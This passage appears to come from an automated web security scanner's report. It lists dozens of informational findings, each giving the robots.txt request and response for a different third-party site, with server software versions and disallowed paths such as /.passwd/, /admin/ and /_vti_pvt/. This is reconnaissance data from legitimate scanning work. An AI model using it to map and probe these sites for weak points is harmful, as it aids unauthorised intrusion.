Disallow: /.onlineFormsDB/
Disallow: /SE/
Disallow: /cgi-bin/
Disallow: /logs/
Disallow: /mail/
Disallow: /stats/
Disallow: /.passwd/
Disallow: /.FeedBack/

27.456. http://www.do512.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.do512.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.do512.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:33 GMT
Server: Apache/2.2.9 (Ubuntu) Phusion_Passenger/3.0.2
Last-Modified: Sat, 09 Jan 2010 16:57:29 GMT
ETag: "82447-3d-47cbe330d9040"
Accept-Ranges: bytes
Content-Length: 61
Cache-Control: max-age=2592000
Expires: Fri, 03 Jun 2011 02:14:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /javascripts/
Disallow: /stylesheets/

27.457. http://www.doctorsmedical.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doctorsmedical.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doctorsmedical.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:48:51 GMT
Server: Apache/2
Last-Modified: Sun, 22 Aug 2010 04:12:44 GMT
ETag: "6528fca-106-48e61be636700"
Accept-Ranges: bytes
Content-Length: 262
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

#
# robots.txt for PHPWIND BOARD
# Version 4.x
#

User-agent: *
Disallow: /admin/
Disallow: /attachment/
Disallow: /data/
Disallow: /image/
Disallow: /ipdata/
Disallow: /js/
Disallow: /mod/
Disallow:
...[SNIP]...

27.458. http://www.dodbuzz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dodbuzz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dodbuzz.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:21:12 GMT
Server: Apache
Last-Modified: Fri, 26 Feb 2010 02:04:48 GMT
Accept-Ranges: bytes
Content-Length: 185
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /cgi-bin/
Disallow: /tmp/
Disallow: /page/
Disallow: /*?
# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://www.dodbuzz.com/sitemap.xml
# END XML-SITEMAP-PLUGIN

27.459. http://www.dodsonandross.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dodsonandross.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dodsonandross.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 22 Feb 2011 17:52:10 GMT
ETag: "23e002-65f-49ce2a3b60680"
Vary: Accept-Encoding
Content-Type: text/plain
Content-Length: 1631
Date: Wed, 04 May 2011 01:52:57 GMT
X-Varnish: 636226098
Age: 0
Via: 1.1 varnish
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.460. http://www.domyownpestcontrol.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.domyownpestcontrol.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.domyownpestcontrol.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:51 GMT
Server: Apache
Last-Modified: Tue, 20 Jul 2010 20:22:16 GMT
Accept-Ranges: bytes
Content-Length: 688
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.domyownpestcontrol.com/sitemap.xml
Disallow: includes/images
Disallow: newsletter/
#Block files that are secure or login oriented
Disallow: advanced_search.php

...[SNIP]...

27.461. http://www.doogleonduty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doogleonduty.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doogleonduty.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:48 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 24 Sep 2010 04:59:27 GMT
ETag: "36ce264-146-490fa3e3929c0"
Accept-Ranges: bytes
Content-Length: 326
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /3rd Party Components/
Disallow: /aspnet_client/
Disallow: /Authenticated/
Disallow: /Bin/
Disallow: /chat/
Disallow: /css/
Disallow: /Data/
Disallow: /Export/
Disallo
...[SNIP]...

27.462. http://www.dorianyatesnutrition.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dorianyatesnutrition.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dorianyatesnutrition.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:13 GMT
Server: Apache
Last-Modified: Wed, 25 Nov 2009 13:56:54 GMT
ETag: "91534a-15b-479326e60b580"
Accept-Ranges: bytes
Content-Length: 347
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /blocks
Disallow: /concrete
Disallow: /config
Disallow: /controllers
Disallow: /css
Disallow: /elements
Disallow: /helpers
Disallow: /jobs
Disallow: /js
Disallow: /lan
...[SNIP]...

27.463. http://www.dorlingkindersley-uk.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dorlingkindersley-uk.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dorlingkindersley-uk.co.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:58:41 GMT
Server: Apache/1.3.27 (Unix) PHP/4.4.6
Set-Cookie: Apache=173.193.214.243.107641304481521538; path=/; expires=Tue, 02-Aug-11 03:58:41 GMT
Last-Modified: Thu, 01 May 2008 15:23:50 GMT
ETag: "1ab28-75-4819e086"
Accept-Ranges: bytes
Content-Length: 117
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /nf/Ecommerce/ShoppingCart?item=
Sitemap: http://www.dorlingkindersley-uk.co.uk/sitemap.xml

27.464. http://www.douglassreport.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.douglassreport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.douglassreport.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:53:25 GMT
Server: Apache
Last-Modified: Wed, 06 Oct 2010 16:53:37 GMT
ETag: "213888a-49-9e60c640"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /wp-
Disallow: /signups
Disallow: /reports-2010


27.465. http://www.doverpost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doverpost.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doverpost.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:50:47 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 167
Content-Type: text/plain;charset=utf-8
X-Cache: HIT from parent1.ghm.zope.net
Age: 857
X-Cache: HIT from cache2.ghm.zope.net
Via: 1.0 parent1.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache2.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close


User-agent: Topix.net
Disallow: /
User-agent: *
Disallow: /mi-holland
User-agent: *
Disallow: /*?view
User-agent: *
Disallow: /!/
User-agent: *
Disallow: /promotions

27.466. http://www.downloadinstantmessengers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.downloadinstantmessengers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.downloadinstantmessengers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:18:26 GMT
Server: Apache
Last-Modified: Wed, 10 Feb 2010 12:18:45 GMT
ETag: "47f3e09259340"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain

# Disallow Web Bots
User-agent: *
Disallow: /

# Disallow Archive Bots
User-agent: ia_archiver
Disallow: /

27.467. http://www.drakerock.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drakerock.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drakerock.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:03:17 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 18 Apr 2010 04:16:00 GMT
ETag: "1d78d5-136-1a10e000"
Accept-Ranges: bytes
Content-Length: 310
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /members
Disallow: /membersMobile
Disallow: /ccb
Disallow: /njs

User-agent: Googlebot
Disallow: /members
Disallow: /membersMobile
Disallow: /ccb
Disallow: /njs


...[SNIP]...

27.468. http://www.drawinghowtodraw.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drawinghowtodraw.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drawinghowtodraw.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:29:12 GMT
Server: Apache
Last-Modified: Wed, 12 Jan 2011 18:03:12 GMT
Accept-Ranges: bytes
Content-Length: 1731
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:29:12 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

27.469. http://www.drcolorchip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drcolorchip.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drcolorchip.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:07:29 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7e
Last-Modified: Fri, 17 Apr 2009 18:04:47 GMT
ETag: "4b6cc-1c-49e8c4bf"
Accept-Ranges: bytes
Content-Length: 28
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:


27.470. http://www.dreamviews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dreamviews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dreamviews.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:12:30 GMT
Server: Apache
Last-Modified: Tue, 17 Aug 2010 21:01:23 GMT
Accept-Ranges: bytes
Content-Length: 22
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 03:17:30 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

27.471. http://www.dressup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dressup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dressup.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:49:24 GMT
Server: Apache
Last-Modified: Tue, 11 Jan 2011 18:27:27 GMT
Accept-Ranges: bytes
Content-Length: 22
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Connection: close
Content-Type: text/plain

User-agent: *
Allow:/

27.472. http://www.dressuplive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dressuplive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dressuplive.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:07:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 18 Apr 2010 20:16:17 GMT
ETag: "dd803e-9d-844e8640"
Accept-Ranges: bytes
Content-Length: 157
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.dressuplive.com/sitemap.xml

User-agent: *
Disallow: /inc/
Disallow: /templates/
Disallow: /admin/
Disallow: /rating/
Disallow: /out.php

27.473. http://www.drgreene.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drgreene.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drgreene.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 11 Nov 2010 23:51:53 GMT
ETag: "130253-670-494cfa880d840"
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 01:09:28 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 1648
Date: Wed, 04 May 2011 01:09:28 GMT
X-Varnish: 486308768
Age: 0
Via: 1.1 varnish
Connection: close

# $Id: robots.txt,v 1.3 2010/09/25 00:37:57 www Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.474. http://www.driversjobsource.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.driversjobsource.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.driversjobsource.com

Response

HTTP/1.1 200 OK
Content-Length: 349
Content-Type: text/plain
Last-Modified: Sun, 30 Jan 2005 20:11:09 GMT
Accept-Ranges: bytes
ETag: "6df550d677c51:d2041"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:49:17 GMT
Connection: close

User-agent: *

Disallow: /_fpclass/
Disallow: /_private/
Disallow: /_themes/
Disallow: /_vti_cnf/
Disallow: /_vti_log/
Disallow: /_vti_pvt/
Disallow: /_vti_script/
Disallow: /_vti_txt/

Dis
...[SNIP]...

27.475. http://www.drivingrules.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drivingrules.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drivingrules.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:32 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Tue, 27 Apr 2010 13:46:03 GMT
ETag: "33730d-168-485381d540883"
Cache-Control: max-age=14400, public
Expires: Wed, 04 May 2011 05:29:32 GMT
Content-Length: 360
Age: 0

# robots.txt file for http://www.drivingrules.net/
# Generated by SOFTplus GSiteCrawler v1.23 rev. 286 / http://gsitecrawler.com/
# 12/8/2009 12:03

User-agent: *
Disallow: /adsource/
Disallow: /Cell
...[SNIP]...

27.476. http://www.drshnaps.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drshnaps.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drshnaps.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:28 GMT
Server: Apache
Last-Modified: Tue, 19 Sep 2006 00:26:27 GMT
ETag: "48e9873-7c-41dc38a8a72c0"
Accept-Ranges: bytes
Content-Length: 124
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

User-agent: googlebot
Disallow: *.cgi
Disallow: *.pl

User-agent: turnitinBot
Disallow: /

27.477. http://www.ds-1.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ds-1.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ds-1.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:28:18 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 02:10:48 GMT
ETag: "cf4b46-77-49aa239998625"
Accept-Ranges: bytes
Content-Length: 119
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /Legal/Bankruptcy-Basics_OH_Strongsville/
Disallow: /Legal/Bankruptcy-Basics_OH_North-Royalton/

27.478. http://www.dslbyzip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dslbyzip.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dslbyzip.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:17:17 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 17 Mar 2011 04:15:35 GMT
ETag: "3afc042-7f-49ea5e9bb47c0"
Accept-Ranges: bytes
Content-Length: 127
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

User-agent: MJ12bot
Disallow: /order
Disallow: /rate_it


Sitemap: http://dslbyzip.com/sitemap.xml.gz

27.479. http://www.dukehealth.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dukehealth.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dukehealth.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:25:48 GMT
Content-Length: 610
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Connection: close

#
# Block Fasterfox prefetching
#
User-agent: Fasterfox
Disallow: /

#
# Rules for the duke-crawler
#
User-agent: duke-crawler
Crawl-delay: 60
Disallow: /trapper/
Disallow: /events/
Disallow: /health_
...[SNIP]...

27.480. http://www.duq.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.duq.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.duq.edu

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:48:26 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 18:51:18 GMT
ETag: "3ff195b-e4-49ccf5966b135"
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: text/plain
Via: 1.1 Juniper1 (Juniper Networks Application Acceleration Platform - DX 5.3.6 0)
Set-Cookie: rl-sticky-key-web=8c3fd3eeebbbf468e238b675cebcfc13; path=/;

User-agent: *
Disallow: /_components/
Disallow: /email/
Disallow: /shared/
Disallow: /CFSharedComps/
Disallow: /sct_supporting_files/
Disallow: /cgi-bin/
Disallow: /test
Disallow: /mombusiness
Disallo
...[SNIP]...

27.481. http://www.durangoherald.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.durangoherald.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.durangoherald.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 13 Apr 2011 16:35:00 GMT
Accept-Ranges: bytes
ETag: "abf262bbf8f9cb1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 03:19:48 GMT
Content-Length: 67
Age: 597
X-Cache: HIT from sxsquid03
X-Cache-Lookup: HIT from sxsquid03:80
Via: 1.0 sxsquid03 (squid/3.0.STABLE18)
Connection: close

# robots.txt for DUstage and DUdev
#
User-agent: *
Disallow: /

27.482. http://www.dvd-cloner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dvd-cloner.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dvd-cloner.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:50 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 28 Oct 2010 04:33:30 GMT
ETag: "1f80dd3-e7-493a5d809b9f8"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.dvd-cloner.com/sitemap.xml
Disallow: /stats
Disallow: /v20
Disallow: /loadv20
Disallow: /Templates
Disallow: /otherdownload
Disallow: /Vista
Disallow: /dvd-to-ipod-co
...[SNIP]...

27.483. http://www.dvdnow.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dvdnow.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dvdnow.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 08 Jan 2010 19:59:21 GMT
Accept-Ranges: bytes
ETag: "15d0e6119d90ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:44:49 GMT
Connection: close
Content-Length: 37

User-Agent: *
Disallow: /login.asp

27.484. http://www.e-onlinecolleges.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.e-onlinecolleges.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.e-onlinecolleges.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:24:45 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 30 Aug 2010 14:59:33 GMT
ETag: "12d2070-78-b650bf40"
Accept-Ranges: bytes
Content-Length: 120
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /index.php
Disallow: /campus.php
Disallow: /canada.php
Disallow: /info_page.php
Disallow: /

27.485. http://www.e-resume.us/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.e-resume.us
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.e-resume.us

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Sun, 06 Dec 2009 10:23:56 GMT
Accept-Ranges: bytes
ETag: "1024a8375e76ca1:2c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:30:14 GMT
Connection: close

User-agent: *
Allow: /


27.486. http://www.e-sarcoinc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.e-sarcoinc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.e-sarcoinc.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:00:33 GMT
Content-Length: 774
Content-Type: text/plain
Last-Modified: Fri, 21 Nov 2008 21:05:05 GMT
Accept-Ranges: bytes
ETag: "468527d41c4cc91:614"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-agent: *

Disallow: /mcp/
Disallow: /themes/
Disallow: /account.aspx
Disallow: /cart.aspx
Disallow: /change-password.aspx
Disallow: /checkout.aspx
Disallow: /custom.css.aspx
Disallow: /
...[SNIP]...

27.487. http://www.e90post.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.e90post.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.e90post.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:20:08 GMT
Server: Apache/2
Last-Modified: Sat, 04 Jul 2009 16:57:49 GMT
ETag: "d2c0527-57b-46de42c3cdd40"
Accept-Ranges: bytes
Content-Length: 1403
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /forums/ajax.php
Disallow: /forums/admincp/
Disallow: /forums/clientscript/
Disallow: /forums/cpstyles/
Disallow: /forums/images/
Disallow: /forums/includes/
Disallow
...[SNIP]...

27.488. http://www.eadvtracker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eadvtracker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eadvtracker.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:54 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 28 Dec 2007 17:23:49 GMT
ETag: "1bc810a-1d-f522d340"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /rd/

27.489. http://www.early-retirement.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.early-retirement.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.early-retirement.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:57:25 GMT
Server: Apache
Last-Modified: Sun, 24 Apr 2011 07:11:41 GMT
ETag: "644-4a1a4cd7be540"
Accept-Ranges: bytes
Content-Length: 1604
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# Forum Folders
User-agent: *
Disallow: /forums/clientscript/
Disallow: /forums/includes/
Disallow: /forums/install/
Disallow: /forums/customavatars/
Disallow: /forums/signatureuploads/

# Forum Files
...[SNIP]...

27.490. http://www.earthweb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.earthweb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.earthweb.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1256246636000"
Last-Modified: Thu, 22 Oct 2009 21:23:56 GMT
Content-Type: text/plain
Content-Length: 26
Date: Wed, 04 May 2011 03:05:49 GMT
Connection: close

User-agent: *
Disallow:

27.491. http://www.easy-birthday-cakes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.easy-birthday-cakes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.easy-birthday-cakes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:40:58 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.easy-birthday-cakes.com/dPX5Y5AY.xml

User-agent: Mediapartners-Google
Disallow:

User-agent: msnbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
Crawl-delay: 30

...[SNIP]...

27.492. http://www.easy-kids-recipes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.easy-kids-recipes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.easy-kids-recipes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:25 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.easy-kids-recipes.com/I456F8aA.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dy
...[SNIP]...

27.493. http://www.easybloom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.easybloom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.easybloom.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:41:57 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 11 Apr 2011 18:39:25 GMT
ETag: "126c0ce-3c-4a0a8e512b140"
Accept-Ranges: bytes
Content-Length: 60
Vary: Accept-Encoding
Via: 1.1 eb-proxy3.plantsense.com
Age: 1519
Connection: close
Content-Type: text/plain

#User-agent: *
Disallow: /go
Disallow: /content/unavailable

27.494. http://www.easyhealthoptions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.easyhealthoptions.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.easyhealthoptions.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 18 Nov 2010 17:27:06 GMT
ETag: "2010c00-87-49557194cce80"
Accept-Ranges: bytes
Content-Length: 135
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /landing/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Disallow: /images/
Allow: /

27.495. http://www.easyseek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.easyseek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.easyseek.com

Response

